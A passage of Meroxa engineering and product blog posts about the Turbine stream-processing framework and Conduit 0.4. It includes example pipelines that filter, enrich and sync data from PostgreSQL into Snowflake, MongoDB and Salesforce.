          record.set(key, address_metadata[key])
        }
    }

    records.unwrap();

    return records;
}

Deploying Your App

Commit your changes

$ git add .
$ git commit -m "Initial Commit"

Deploy your app

$ meroxa apps deploy

Once your app is deployed, you will see your Snowflake DB populate with all the enriched data from the PostgreSQL table. You can also insert a record into your table to see it stream over to Snowflake in real-time!

Meroxa sets up all the connections and remove the complexities, so you, the developer, can focus on the important stuff.

What's Next

In our next blogpost we will look at how to use Meroxa with the Twillio API & Telnyx API to transform telephony data and trigger SMS events to new customers in our database. We will do phone number enrichment to validate which customers in our database have registered with a mobile phone number that is capable of receiving SMS messages and later we will trigger SMS messages to those valid numbers. Stay tuned!

Have questions or feedback?

If you have questions or feedback, reach out directly by joining our community or by writing to support@meroxa.com.

Happy Coding 🚀

Journey to IR: How Meroxa Improved Stream Processing App Efficiencies

Anna Khachaturova — Tue, 07 Feb 2023 22:00:59 GMT

In April 2022 the Meroxa team introduced a new data application framework, Turbine. Turbine allows users to build, test and deploy data applications using one of three supported languages: Go, Python and JavaScript. If you would like to read more about Turbine, please check out the following blogs:

During the initial design of the Turbine framework, the team agreed upon an orchestration that would help us to evaluate if the framework was worth investing in without introducing too much complexity into our system. When the users would use commands such as “deploy” and “run” on their applications, the Meroxa CLI would then process the commands and make appropriate calls to each of the Turbine Language Libraries. For each of the supported languages in the Turbine framework, we developed a corresponding Turbine Language Library that would parse the application code and make separate calls to a Turbine API Client for each of the resources that needed to be created. The Turbine API Client would interact with our Meroxa Platform API to create and manage pipelines, connectors and functions. The example below shows how during application deployment, the following flow was executed across four different code components: CLI, Turbine Language Library, Turbine API Client and Meroxa Platform API.

Evaluating Challenges and Improving our Framework

With the release of our Turbine framework being a success, the team decided to redesign the orchestration to be more flexible. As each client needed separate code maintenance, we’d sometimes see deployments behave differently across each supported language. Having a separate Turbine Library and a client for each language posed a challenge for when we would need to add support for other languages. Having both CLI and Turbine API clients handle the calls to the Meroxa Platform API wasn’t ideal as it slowed our ability to test and revert changes. Making any functional changes to application deployment or Turbine logic would also require modifying each Turbine Language Library and client as well. This increased the scope of even the smallest of changes. So we sought to have a more unified place for application orchestration. In order to address these challenges, we looked for a better way to orchestrate the application deployment.

Intermediate Representation as a Solution

In order to improve the efficiency of Turbine, the team implemented Intermediate Representation, or IR. IR is a blueprint that is used to deploy a stream processing application. It maps its desired structure, defining how resources are associated with each other and what needs to be created for a stream processing application to be deployed based on the user's application definition. The IR spec is sent to Meroxa Platform API for deployment, and below, you can see an example of one.

(An applications IR that has a single source, function and a destination)

All resource creation is now handled at the same time by using the definition from the spec. With the functions, connectors and streams of the application defined in IR, Meroxa Platform API can use the spec to first create a source connector, necessary to retrieve data from source resources. Afterwards, any functions defined in the application are created, and finally the destination connectors to transfer the data to destination resources. The Meroxa Platform API would know the flow of data by looking at streams and mapping which resource is the input or output. As we can see in the chart below, this removes steps during application deployment and simplifies the process.

For additional flexibility, we decided to go with a DAG, Direct Acyclic Graph, approach of building and mapping application resources. This allows us to detect any cycles in the application flow that would cause an infinite loop, and gives our users more versatility in designing their applications. With a DAG, we introduced a concept of “streams” that helped us map which resource connected to which in the application flow. Below we can see an example of a data application deployed with multiple destinations with the use of IR:

This flexibility allows users to create data applications with the following topologies:

Source → Destination

Data is retrieved from a single source and sent to a destination without a function.

(source → destination)

Source → Destinations[n]

Data is retrieved from a single source and sent to multiple destinations without a function.

(source → destination[n])

Source → Function

Data is retrieved from a single source and sent to a function for processing.

(source → function)

Source → Function → Destination

Data is retrieved from a single source to be processed through a function and sent to a destination. An example of a spec with this flow can be seen in the IR spec image above.

(source → function → destination)

Source → Function → Destinations[n]

Data is retrieved from a single source to be processed through a function and sent to multiple destinations.

(source → function → destination[n])

Source → Destination[0] | Source → Function → Destination[1]

Data is retrieved from a single source and sent as is to one destination, and runs through a function for processing then sent to another destination.

(source → destination[0] | source → function → destination[1])

TodayTurbine only allows a single source resource for the applications. The IR approach allows us to implement more flexibility in the future. In our IR schema, we also capture git sha, Turbine Language versioning, and any secret keys that were defined in the application that are necessary for deployment in a unified place.

The use of IR in our orchestration allows for easier future feature development as well as adding support to new languages. We were able to add Ruby as one of the new supported languages completely with IR, and the implementation went seamlessly. As one of our upcoming projects, we will be creating a unified backend for Turbine, removing the need of each Turbine Language Library, and IR is a crucial step in the design. With this new approach, we created a consistent way to deploy, debug and update data applications on Meroxa across all languages that are supported.

Optimize and Realize Value in Snowflake with Meroxa

Tanveet Gill — Thu, 02 Feb 2023 18:46:35 GMT

Snowflake is a company that offers cloud-based storage options. Customers don't have to set up or maintain servers because the whole data storage service is entirely managed. While it has several benefits for consumers, including simplicity, speed, and the ability to easily share data, many criticize it’s high price due to the high volume of queries users need to make and the amount of data they need to store on Snowflake.

Some companies have tried to keep their Snowflake costs down by limiting business use or making the data warehouse developers do more work to limit the number of events that get sent to Snowflake. These methods aren't always feasible, they're often time-consuming and tedious, and they only offer marginal savings.

With Meroxa, companies can cut their Snowflake storage and compute costs and make their developers much more productive. Meroxa allows you to easily:

Filter data before it's ingested
Denormalize data to reduce compute costs
Reduce operational costs

What is Meroxa?

Meroxa is a Stream Processing Application Platform as a Service (SAPaaS) where developers can run their Meroxa Turbine applications. Turbine is a stream processing application framework for building event-driven stream processing apps that respond to data in real-time and scale using cloud-native best practices. Meroxa handles the underlying streaming infrastructure so that developers can focus on building their applications. Turbine applications start with an upstream resource. Once that upstream resource is connected, Meroxa will take care of streaming the data into the Turbine application so that it can be run. Since Meroxa is a developer-first platform, engineers can ingest, orchestrate, transform, and stream data to and from anywhere using languages they already know, such as Go, JavaScript, Python, or Ruby. Support for Java, and C# is also on the way.

💡 Meroxa has support for many resources to get data from and to. You can see which resources are supported here. If there's a resource not listed you can request it by joining our community or by writing to support@meroxa.com. Meroxa is capable of supporting any data resource as a connector.

How Meroxa reduces Snowflake costs

Filtering data before it's ingested

Before putting data into Snowflake, unnecessary information should be filtered away to save storage and processing costs in addition to reducing the quantity of data. Data is kept in micro-partitions based on the date and time of ingestion as it is imported into Snowflake. More micro-partitions are produced as more data is loaded into Snowflake, which may result in higher storage costs. In just a few lines of code, we can use Meroxa to filter away irrelevant data before loading it into Snowflake.

A simple example in Turbine (Python), where we filter the data based on orderDollarValue would look like this:

import logging
import sys

from turbine.runtime import RecordList
from turbine.runtime import Runtime

def filter(records: RecordList) -> RecordList:
    logging.info(f"processing {len(records)} record(s)")
    filtered_records = []
    for record in records:
        try:
            payload = record["payload"]
            orderDollarValue = payload["orderDollarValue"]

            # Keep only records where orderDollarValue > 10000
            if orderDollarValue > 10000:
                filtered_records.append(record)
        except Exception as e:
            print("Error occurred while parsing records: " + str(e))
            logging.info(f"output: {record}")
    return filtered_records

class App:
    @staticmethod
    async def run(turbine: Runtime):
        try:
            # Load and Read Tables from any source
            source = await turbine.resources("myPostgreSQL") # MySQL, Sql Server, Kafka, Mongo etc
            records = await source.records("customer_orders", {})

            # Process Data
            filtered = await turbine.process(records, filter)

            # Write to any Destination
            destination_db = await turbine.resources("mySnowflake")
            await destination_db.write(filtered, "collection_archive", {}) # Snowflake, S3, Mongo, Redshift etc
        except Exception as e:
            print(e, file=sys.stderr)

Denormalize data to reduce compute costs

Spending less time and money on maintaining Snowflake can help you save money by making it easier to find important information faster. By denormalizing the data with Meroxa before loading it into Snowflake, more information is added that can be used to better understand and analyze the data. The denormalized data may have answers to certain questions or may be better organized and structured in a way that makes it easier to query.

In Turbine (Javascript), a simple example of enriching and denormalize addresses in our records using a third-party API would look like this:

// Import any dependencies just like a regular application
const { googleMapsLookup, generateAddressObject } = require('./googleMapsApi.js')

export class App {
	enrich(records) {
    records.forEach((record) => {      
      // Call the Google Maps API and enrich the address on each record
      const addressLookupResults = googleMapsLookup(record.get('address'))
      const addressMetaData = generateAddressObject(addressLookupResults)
      record.set('address_metadata', addressMetaData);
    });
    return records;
  }

  async run(turbine) {
    // Load and Read Tables from any source
    let source = await turbine.resources("myPostgreSQL"); // MySQL, Sql Server, Kafka, Mongo etc
    let records = await source.records("customer_shipping");
    
    // Process Data
    let enriched = await turbine.process(records, this.enrich);

    // Write to any Destination
    let destination = await turbine.resources("mySnowflake"); // Snowflake, S3, Mongo, Redshift etc
    await destination.write(enriched, "enriched_customer_shipping");
  }
}

💡 For a more detailed example on using API’s & doing transformations in Turbine you can read our blog post here.

Reduce operational costs

Meroxa allows developers of any level to build data pipelines to ingest, orchestrate, transform, and stream data to and from anywhere using languages they already know. This process typically requires Snowflake subject matter experts and can take months to deliver data projects. Meroxa allows anyone to be a snowflake expert and reduces the number of hours and resources needed to support Snowflake, ultimately delivering data projects faster.

A typical workflow for a data project with Meroxa is cost-effective, enterprise-ready in days, allows for rapid prototypes & conclusions, and offers code reusability:

Meroxa Key Benefits

Code First - Developers can build data products in the language of their choice with the ultimate flexibility that code provides. Import packages, and modules to easily build with data.

Open-Source - Built on open-source technology to give enterprises the security and flexibility they need. No vendor lock-in.

Easily manage hundreds of integrations - Our innovative platform automatically creates a shared data stream catalog and embeds it into your workflows so you can search, find, and reuse data streams effortlessly.

Automatically connect, configure, and orchestrate data integrations - Don’t stress over data orchestration: our platform has over a dozen pre-configured integrations for databases, cloud, SaaS apps, and streaming services…and we’re adding more on a regular basis.

Scale dynamically with serverless architecture - Build reusable and scalable components with standardized processes, allowing you to work efficiently while maximizing available resources.

Build, Test, Deploy - it’s that simple. Build your stream processing application using a language of your choice, test with data we sample for you, and deploy your application.

Want to learn more about how Meroxa can help you realize more value in Snowflake? Schedule a demo today.

Happy Coding 🚀

Save Money on Workato and Gain Real-Time Data Streaming with Meroxa

Simon Lawrence — Wed, 25 Jan 2023 20:11:23 GMT

In my last post I contrasted data apps with web apps, which was a fairly high-level discussion. This time around, I decided to get a little more hands on and show you how we’re using data apps at Meroxa to power Meroxa the business. The app I’m going to talk about is one we developed to simplify how we get account and subscription data to Salesforce so our sales and marketing teams could make use of it.

Where we started

Before we get into the app, let’s begin by talking about how we were getting data from our data warehouse to Salesforce. Prior to using our own platform we made use of Workato. Workato is a no-code solution that allows you to create “recipes” in their graphical editor. The recipe pulled data from our data warehouse, made a few API calls and then wrote data to our Salesforce instance. There wasn’t an option for real-time so we compromised and setup the recipe to execute hourly. The diagram below illustrates the setup.

While this setup worked there were a few points of friction. The first was general lifecycle management of the recipes. The process for managing, testing and updating recipes was not great, especially for engineers who are used to version control and mature CI/CD pipelines. The second issue was that it was hard for new engineers to quickly understand what the recipe was doing. Understanding a recipe required navigating up and down levels in the Workato editor. We found ourselves wanting to just write code. With the introduction of Turbine, Meroxa’s data application framework that lets you quickly sync, persist, and transform data between data infrastructure, we saw this use case as a perfect candidate for replacement with a Turbine data app.

Where we are now

The diagram below shows a high-level view of our new setup. Instead of a Workato recipe we now have a real-time Turbine data app deployed on the Meroxa platform.

By solving this issue using a Turbine data app we were able to gain several benefits. Instead of having to learn a specialized editor our developers are able to use their existing workflows. By bringing this solution into the realm of code any engineer on the team can improve and support it. Learning what the app does is now simply a matter of reading the code. Finally our data-app is real-time rather than being an hourly batch job.

How’d we do it?

While the picture above it nice, I’d like to get into the details of what’s actually involved.

So what did we need to do to get all these benefits?

Register a Salesforce OAuth App
Write a Turbine data app to replace the recipe.

The Salesforce App

Our first step was using the Salesforce Admin Console to create an app that we could use to interact with their API. I won’t go into detail on creating a connected app, you can find Salesforce’s documentation here. Once the Salesforce app was set up and we had our client_id and client_secret it was time to actually write our Turbine App.

Writing our Turbine App

The main tasks our Turbine app needed to accomplish was taking the event data supplementing it with info from Stripe and transforming it into the proper format for Salesforce. Let’s see how we were able to accomplish that with a minimal amount of code.

Here we’re using Stripe’s Go client library to fetch subscription information. What’s great about this code is that nothing about it is Turbine specific. Turbine apps can easily use internal libraries and share code with existing applications, reducing duplication and easing development.

package main

import (
	"github.com/stripe/stripe-go/v72"
	"github.com/stripe/stripe-go/v72/sub"
)

//<SNIP>

func translateStatus(subStatus stripe.SubscriptionStatus) string {
	if subStatus == "past_due" {
		return "Past Due"
	} else {
		return string(subStatus)
	}
}

func (bsf BasicStripeFetcher) fetchSubscriptionStatus(subID string) (string, error) {
	stripe.Key = bsf.apiKey

	subscription, err := sub.Get(subID, nil)
	if err != nil {
		return "", err
	}

	status := translateStatus(subscription.Status)
	return status, nil
}

The code below shows how we send data to the Salesforce API. Once again nothing Turbine specific here, we’re simple manipulating data and calling an API.

package main

import (
	"errors"
	"fmt"
	"log"

	"github.com/simpleforce/simpleforce"
)

type ProductData struct {
	accountId            string
	email                string
	givenName            string
	familyName           string
	planName             string
	stripeSubscriptionId string
	subscriptionStatus   string
	accountCreatedAt     string
}

type SalesforceUpdater interface {
	updateProductInstance(data ProductData) error
}

type BasicSalesforceUpdater struct {
	client *simpleforce.Client
}

//<SNIP>

func (bsu BasicSalesforceUpdater) query(data ProductData) error {
	q := fmt.Sprintf("SELECT FIELDS(ALL) FROM Product_Instance__c WHERE Workspace_Id__c = '%s' LIMIT 1", data.accountId)
	result, err := bsu.client.Query(q)
	if err != nil {
		return err
	}

	if len(result.Records) != 1 {
		return errors.New("unexpected query result")
	}

	obj := result.Records[0]

	if obj == nil {
		return errors.New("No Product Instance Found")
	}

	firstName := obj.StringField("Admin_First_Name__c")

	if firstName == "" {
		return errors.New("Couldn't fetch first name")
	}

	return nil
}

func (bsu BasicSalesforceUpdater) updateProductInstance(data ProductData) error {
	obj := bsu.client.SObject("Product_Instance__c").
		Set("ExternalIDField", "Workspace_Id__c").
		Set("Workspace_Id__c", data.accountId).
		Set("Name", "Org: "+data.accountId).
		Set("Admin_Email__c", data.email).
		Set("Admin_First_Name__c", data.givenName).
		Set("Admin_Last_Name__c", data.familyName).
		Set("Product__c", data.planName).
		Set("Stripe_Subscription_Id__c", data.stripeSubscriptionId).
		Set("Subscription_Status__c", data.subscriptionStatus).
		Set("Workspace_Created_At__c", data.accountCreatedAt).
		Upsert()

	if obj == nil {
		return errors.New("upsert failed!")
	}

	return nil
}

Finally we pull it all together in our app.go. Here we’re using the Turbine framework to connect to our data source, get the stream of events, and process those events using the the helper functions defined above.

package main

//<SNIP>

func (a App) Run(v turbine.Turbine) error {
	platformDB, err := v.Resources("MY_DATA_WAREHOUSE")
	if err != nil {
		return err
	}

	configs := turbine.ResourceConfigs{
		turbine.ResourceConfig{
			Field: "table.types",
			Value: "VIEW",
		},
		turbine.ResourceConfig{
			Field: "incrementing.column.name",
			Value: "account_id",
		},
		turbine.ResourceConfig{
			Field: "validate.non.null",
			Value: "false",
		},
	}
	rr, err := platformDB.Records("tablename", configs)
	if err != nil {
		return err
	}

	//<SNIP>

	v.Process(rr, WriteToSalesforce{})

	return nil
}

//Converting the Turbine Record data to a form that's ready for
//sending to salesforce
func RecordToProductData(r turbine.Record) ProductData {
	accountId := r.Payload.Get("account_id").(float64)
	createdAt := r.Payload.Get("account_created_at").(float64)

	givenName, ok := r.Payload.Get("user_given_name").(string)
	if !ok {
		givenName = ""
	}

	familyName, ok := r.Payload.Get("user_family_name").(string)
	if !ok {
		familyName = ""
	}

	planName, ok := r.Payload.Get("plan_name").(string)
	if !ok {
		planName = ""
	}

	return ProductData{
		accountId:            strconv.Itoa(int(accountId)),
		email:                r.Payload.Get("user_email").(string),
		givenName:            givenName,
		familyName:           familyName,
		planName:             planName,
		stripeSubscriptionId: r.Payload.Get("stripe_subscription_id").(string),
		accountCreatedAt:     strconv.Itoa(int(createdAt)),
	}
}

type WriteToSalesforce struct{}

func (f WriteToSalesforce) Process(rr []turbine.Record) []turbine.Record {

  //<SNIP> fetching of env vars

	salesforceUpdater, err := newBasicSalesforceUpdater(salesforceInstanceUrl, salesforceClientId, salesforceUser, salesforcePassword, salesforceToken)
	if err != nil {
		log.Fatal("ERROR: salesforce updater creation failed")
	}

	for _, r := range rr {
		pd := RecordToProductData(r)
		subscriptionId := r.Payload.Get("stripe_subscription_id").(string)
		subscriptionStatus, err := subscriptionFetcher.fetchSubscriptionStatus(subscriptionId)

		if err != nil {
			continue
		}

	  //update our data with information from Stripe
		pd.subscriptionStatus = subscriptionStatus
		err = salesforceUpdater.updateProductInstance(pd)
	}

	// return original records unmodified
	return rr
}

In the interest of space I’ve included only interesting snippets of code, but the full source files can be found here.

We’re currently running this application in production and it has allowed us to save almost $150,000 per year by ending our use of Workato. We already have a few updates in the pipeline to give our marketing and sales teams even more data. Look for future posts where I cover any updates we roll out.

Hopefully, you come away from this post with an appreciation of how Turbine data apps can solve a class of problems that almost all companies have. Let us know what you think by joining the discussion on our Discord channel or in Github discussions. We can’t wait to see what you build. Click here to get started.

Introducing Turbine Ruby

Jennifer Hudiono — Tue, 24 Jan 2023 17:00:40 GMT

We are excited to announce—software developers can now build Turbine data applications with Turbine Ruby. This addition expands the capabilities of our platform and allows for even greater flexibility in processing and analyzing data streams.

The Turbine application framework is designed for software developers to build, test, and deploy their data streaming applications. Turbine streamlines this experience for software developers by abstracting the complexity associated with running and scaling a data application such as separate task-specific tooling, new and unfamiliar paradigms, and managing complex services. Combining Ruby’s simplicity and power with Turbine, Rubyists can now build, test, and deploy data streaming apps on Meroxa!

Turbine.rb

You can get started building your data streaming application in Ruby by creating a free Meroxa account and downloading our CLI. Set up will also require local installation of Git, the latest Ruby version. We also recommend downloading a Ruby version management tool of your choice.

Recommended Ruby version management tools:

If you have a Ruby version management tool installed, you can install ruby through your version management tool and specify which version you would like installed for your development use case.

Quickstart

Once setup and installation are complete, you can start building your stream processing app. Initialize the streaming app within the local directory you are currently in by running the following command:

You may define a different local directory path for the app project by using --path /your/local/path/ in your command.

A local app project directory will automatically be created on your local machine, complete with everything you need to build a streaming app with Tubrine.rb. The app project will include the following files:

The app.rb file is the core of your streaming app. Self-documented TurbineRb boilerplate code is already written to help you get started at /your/local/path/yourappname/app.rb. All that awaits is your creativity demonstrated through code.

In the next section, we will run the example app above to test its output.

Running Your Application

You can run your app locally without changing any of the TurbineRb boilerplate code provided in the local app project directory. Simply navigate to the root of the app project using cd /your/local/path/yourappname and use meroxa app run to run your streaming app locally. Running the example app provided, will take records provided by the fixtures which contain a message and output that exact message. You can include the commented out transformations to see that transformation applied to the record.

If you see the following output—Then you have successfully run a streaming app locally!

Deploying Your Application

Before deploying your application, ensure the resources used by your Turbine data app exist on the Meroxa Platform. You can check using the Meroxa Dashboard or CLI by running the meroxa resources list command --this command lists all resources and their state. If the resources don't exist, you must configure your resources using the Meroxa Dashboard.

Using the Meroxa CLI, run the meroxa app deploy command in the project folder root of your Turbine data app, this will start the process of deployment. The Meroxa CLI will print out the steps taken and confirm once deployment is successful.

For a more detailed walkthrough of creating a Turbine Ruby application, refer to our documentation.

Have questions or feedback?

We love hearing from our customers! If you have questions or feedback, please feel free to contact us directly at support@meroxa.com or by joining our Discord community server.

🚀 We can’t wait to see what you build!

Conduit 0.4

Rimas Silkaitis — Thu, 15 Dec 2022 17:11:04 GMT

Conduit 0.4 is out! Conduit’s a tool to help developers build streaming data pipelines between production data stores and messaging systems. For example, if you’ve ever used tools like Kafka Connect, Conduit can be used as a drop-in replacement to help stream data to Apache Kafka. With this release the theme was error handling and debugging. Here’s a look at some of the more interesting features as part of this release.

Stream Inspector

Building data pipelines is more difficult than, say, building a web application. In web applications, the developer is in control of the user inputs and the data coming into the system. With data pipelines and data applications, the system has to respond to whatever data is given to it. This means schemas and associated data may change over time and the system has to be able to handle it. In these situations, being able to see what the data looks like throughout the Conduit pipeline is critical to being able to debug what’s happening.

In this release, developers will now be able to peek at the data as it enters Conduit via source connectors and what the data looks like as it travels to destination connectors. The ability to peek at data as it enters or leaves processors will be coming in a future release. Keep in mind that this feature is about sampling data as it passes through the pipeline not tailing the pipeline.

$ wscat -c ws://localhost:8080/v1/connectors/pipeline1:destination1/inspect | jq .
{
  "result": {
    "position": "NGVmNTFhMzUtMzUwMi00M2VjLWE2YjEtMzdkMDllZjRlY2U1",
    "operation": "OPERATION_CREATE",
    "metadata": {
      "opencdc.readAt": "1669886131666337227"
    },
    "key": {
      "rawData": "NzQwYjUyYzQtOTNhOS00MTkzLTkzMmQtN2Q0OWI3NWY5YzQ3"
    },
    "payload": {
      "before": {
        "rawData": ""
      },
      "after": {
        "structuredData": {
          "company": "string 1d4398e3-21cf-41e0-9134-3fe012e6d1fb",
          "id": 1534737621,
          "name": "string fbc664fa-fdf2-4c5a-b656-d52cbddab671",
          "trial": true
        }
      }
    }
  }
}

Stream inspection is available via the Conduit API and Dashboard.

Dead Letter Queues

Continuing the theme of failures throughout a data pipeline, what should happen with the data if it’s failed to be processed? Dead Letter Queues are one such way. Let’s assume that if a message does have an error in it, in Conduit 0.4, you now have the option of sending the message to another connector to be saved. What you do with that message is up to you. For example, you could choose to create another Conduit pipeline to reprocess once you’ve figured out the root cause.

To get started with a Dead Letter Queue, you have to specify that you want one as part of your pipeline in the Conduit Pipeline Configuration File:

version: 1.1
pipelines:dlq-example-pipeline:
	connectors:
    	[...]
    dead-letter-queue:
    	# disable stop window
        window-size: 0
        
        # the next 3 lines explicitly define the log plugin
        # removing this wouldn't change the behavior, it's the default DLQ config
        plugin: builtin:log
        settings:
        	level: WARN

Dead Letter Queues can only be created by using the Pipeline Configuration file. In future releases, we plan to make this functionality available via Conduit’s API.

Connector Parameter Validation

Conduit connectors can require any number of parameters and data types to be able to successfully connect to a variety of data stores. In this release, Conduit connector developers can now encode the required parameters in their connectors and Conduit will surface the correct error messages to the end users. This is huge because this should help provide consistent messages and make the connector setup process easier.

And the rest

If you want to see the full list of what was included in this release, check out the Conduit Changelog and the documentation. Also, feel free to join us on Discord or Twitter.

Sync, Transform, & Migrate data in Real-Time from PostgreSQL to MongoDB w/ Meroxa

Tanveet Gill — Tue, 13 Dec 2022 23:23:20 GMT

Video Tutorial (1 minute)

Github Repo:meroxa/turbine-examples/javascript/user-demo/

💡 To see how to move data out of Mongo to any data destination, check out our blog post here: https://meroxa.com/blog/streaming-changes-in-real-time-from-mongodb-to-apache-kafka

This blog covers using MongoDB as a downstream source. We will be moving data in real-time from PostgreSQL to MongoDB. Meroxa will keep track of any changes in your PostgreSQL database and post those CREATE, UPDATE or DELETE operations in MongoDB, keeping both in Sync.

Migrating data from PostgreSQL to MongoDB or vice versa can be a time-consuming process. With Meroxa you can do this in just a few lines of code. In this blog post we will be keeping our PostgreSQL database in sync with our MongoDB Atlas instance. In addition, we will briefly go over how you can transform the data going into MongoDB in real-time.

While this post covers getting data into Mongo, we can also pull data out of Mongo to any data destination by doing the opposite of what's covered in this post (Here’s a blog post on moving data from MongoDB to Apache Kafka in real-time).

What is Meroxa?

Meroxa is a streaming application platform where developers can run their Turbine applications. Meroxa handles the underlying streaming infrastructure so that developers can focus on building their applications. Turbine applications start with an upstream resource. Once that upstream resource is connected, Meroxa will handle streaming the data into the Turbine application for execution.

What is Turbine?

Turbine is a stream processing application framework for building event-driven data apps that respond to data in real-time and scale using cloud-native best practices. No bespoke domain-specific language (DSL).

You can even see how your app reacts to data by running your Turbine data applications locally—we show you exactly what will happen in Production, with faster iteration and development without having to deploy.

You can write your Turbine data apps using Go, Javascript, Python, or Ruby.

💡 If you prefer to use another language, Meroxa has support for many more languages coming, reach out directly to suggest a language by joining our community or by writing to support@meroxa.com

How it works

In this example, the Turbine app will create a CDC (Change Data Capture) connector from the platform to a PostgreSQL database (can be any database) and then writes that data to MongoDB Atlas.

Here's what happens and what we can do to stream and transform our data:

The PostgreSQL connector receives changes in real-time and publishes them in the form of a stream.
Inside our Turbine app we can write functions to transform and manipulate that data. We can do anything we would generally do with any programming language such as calling APIs or importing packages and libraries and change that data.
The Meroxa Platform then streams that data to MongoDB in real-time, without you, the developer having to worry about scalability, flexibility or schemas.

Requirements

Meroxa account
Meroxa CLI
Meroxa supported PostgreSQL DB
MongoDB Instance
Node JS (In this tutorial we will be using the Turbine Javascript Framework)

Setup

Once you have signed up for Meroxa and set up the Meroxa CLI you can follow the following 4 steps to get up and running:

💡 Here we are creating the resources via the CLI, you can also do so via the Meroxa Dashboard once you are logged in.

Adding your PostgreSQL and MongoDB Atlas Resources

PostgreSQL (Guide on configuring your PostgreSQL) - Source Resource

Below we are creating a PostgreSQL connection to Meroxa named pg_db.

Note: To support CDC (Change Data Capture) we turn on the logical_replication flag.
```
$ meroxa resource create pg_db \\\\
--type postgres \\\\
--url postgres://$PG_USER:$PG_PASS@$PG_URL:$PG_PORT/$PG_DB \\\\
--metadata '{"logical_replication":"true"}'
```
MongoDB Atlas (Guide on setting up Mongo Db Atlas) - Destination Resource

Below we are creating a MongoDB Atlas connection named mdb.
```
$ meroxa resource create mdb \\
--type mongodb \\
--url "mongodb+srv://$MONGO_USER:$MONGO_PASS@$MONGO_URL/$MONGO_DATABASE_NAME"
```
Initializing our Turbine app
```
$ meroxa apps init postgres-to-mongo --lang js  
```
This will create a directory called postgres-to-mongo with some boilerplate code to get you started.

Coding our Turbine app

Open up your postgres-to-mongo folder in your preferred IDE. Let’s code our upstream and downstream resources that we defined in step 1 above.

async run(turbine) {
  // First, identify your PostgreSQL source name as configured in Step 1
  // In our case we named it pg_db
  let source = await turbine.resources("pg_db");

  // Second, specify the table you want to access in your PostgreSQL DB
  let records = await source.records("User");

  // Third, Process each record that comes in!
  let processed = await turbine.process(records, this.processData);

  // Fourth, identify your MongoDB destination resource configured in Step 1
  let destination = await turbine.resources("mdb");

  // Finally, specify which "collection" in mongo to write to. If none exists, it will be created
  await destination.write(processed, "user_copy");
}

In our processData function we will just be logging the time when the record was processed. However, in this function you can do anything to transform your records, such as calling an API, manipulating data, enriching data etc. In the code below we have some examples in the comments.

processData(records) {
  for (const record of records) {
    const dateTimeGmt = new Date().toGMTString()
    console.log(`[DEBUG] Streaming Record To Destination: ${dateTimeGmt}`)

    // Encrypt data using a 3rd party library or package
    record.set(
      'secretcode',
      sha256(record.get('secretcode'))
    );

    // Format Data via a custom function
    record.set('phone_number', formatPhone(record.get('phone_number')))

    // Enrich Data via an API
    const addressLookupResults = await googleMapsLookup(record.get('address'))
    const addressMetaData = generateAddressObject(addressLookupResults)
    record.set('address_metadata', addressMetaData);
  }

  records.unwrap();
  return records;
}

💡 For a more detailed example on using API’s & doing transformations in Turbine you can read our blog post here.

Deploying Your Application

Commit your changes
```
$ git add .
$ git commit -m "Initial Commit"
```
Deploy your app
```
$ meroxa apps deploy
```
💡 To visualize your deployed application, you can check out an overview of our Turbine visualizations here.

Once your app is deployed you will see the PostgreSQL data populate in the user_copy collection in MongoDB Atlas. As records or changes come into your data source (PostgreSQL in this example), your Turbine app running on the Meroxa platform will process each record in real-time!

Meroxa will set up all the connections and remove the complexities, so you, the developer, can focus on the important stuff.

Have questions or feedback?

If you have questions or feedback, reach out directly by joining our community or by writing to support@meroxa.com.

Happy Coding 🚀

Introducing Visualized Turbine Applications

Sara Menefee — Thu, 08 Dec 2022 15:36:37 GMT

We are excited to announce—software developers can now visualize what is happening behind the scenes with their Turbine data apps deployed to the Meroxa Platform. The application visualization provides insight into runtime details of subcomponents the Meroxa Platform builds and configures based on the code written with Turbine. Including the directional flow of data.

We designed the Turbine Application Framework withdeveloper experience in mind. There's no need to learn a proprietary DSL (domain-specific language). Software developers can use their choice of supported programming language to build, test, and deploy robust data apps to process data streams. All while coexisting alongside an existing ecosystem of apps and services.

The Meroxa platform simplifies deployment by abstracting away the complexity required to build out and configure the various subcomponents necessary to run the data app and scale it dynamically, on demand, on our serverless architecture. The visualization aims to make this transparent.

Turbine Application Details

The app visualization lives in the application details page for your Turbine data apps. Here’s what you can expect.

Source

A Source is a required Resource that contains the upstream data for the Turbine data app. There is a limitation of one Source per Turbine data app as we do not yet support multiple Sources. You may however include any number of APIs in your function to help enrich the data stream.

The Source node in the app visualization communicate the name, type, state, collection (e.g. table, collection, index, etc), and last updated timestamp.

Function

A Function contains the custom code you have written using the process method. This is where you can transform or enrich data with any number of APIs from third-party platforms and services. The app visualization communicates the name, state, and last updated timestamp for the Function.

Destination(s)

A Destination is a Resource where data will be sent from the Turbine data app downstream. You may leverage any number of Destinations, or none at all. It’s up to you.

Destination nodes in the app visualization communicate the name, type, state, collection (e.g. table, collection, index, etc), and last updated timestamp.

Data Flow

Between each node, you should see an arrow pointing in the direction of where the data is going. An arrow may originate from a Source Resource to a Function or Destination Resource. Or from a Function to a Destination Resource. This will show you where your data is going directionally. Please note, we do not yet validate whether data is moving.

Viewing and Access

You can access the app visualization on the details page in the Meroxa Dashboard for the Turbine data app. This details page can be accessed directly through the dashboard or via a URL when using select commands in the Meroxa CLI.

Dashboard

Log in to your Meroxa account. Once authenticated, you should land on the Applications tab. This will list all Turbine data apps deployed to your account along with their state. Click on the application name of choice to view the details page. This is where your app visualization may be accessed.

CLI

Within the Turbine data app local project file, you may use meroxa app describe in the Meroxa CLI will output details about your Turbine data app. Provided with details about the Turbine data app subcomponents that exist, there will be a URL that can be used to access the visualization in the Meroxa Dashboard.

If you are working outside of the Turbine data app local project file, you can use meroxa app describe appname.

$ meroxa app describe

    UUID:   123ab456-c7d8-91e0-fghi-j12k34lm56n
   Name:   yourappname
Language:   javascript
Git SHA:   ab1234c567de8910f1234g567891011h12i13j0k
Created At:   2022-11-16 19:22:26 +0000 UTC
Updated At:   2022-11-16 19:22:26 +0000 UTC
    State:   running
Resources
	pgdb (jdbc-destination)
		UUID:   12c228be-523c-477b-b4b5-2d25f6d05e8a
		Type:   postgres
		State:   running
	pgdb (debezium-pg-source)
		UUID:   98z765yx-432w-109v-u8t7-6s54r3q21p0o
		Type:   postgres
		State:   running

Functions
	anonymize-ab1234c
		UUID:   1a234bc-d567-8910-ef12-3456gh78ij90
		State:   running

    ✨ To visualize your application, visit https://dashboard.meroxa.io/apps/<yourappname>/detail

Using meroxa app list will display a table of all Turbine data apps deployed to your Meroxa account. This will include a direct URL to the Applications list page in the Meroxa Dashboard.

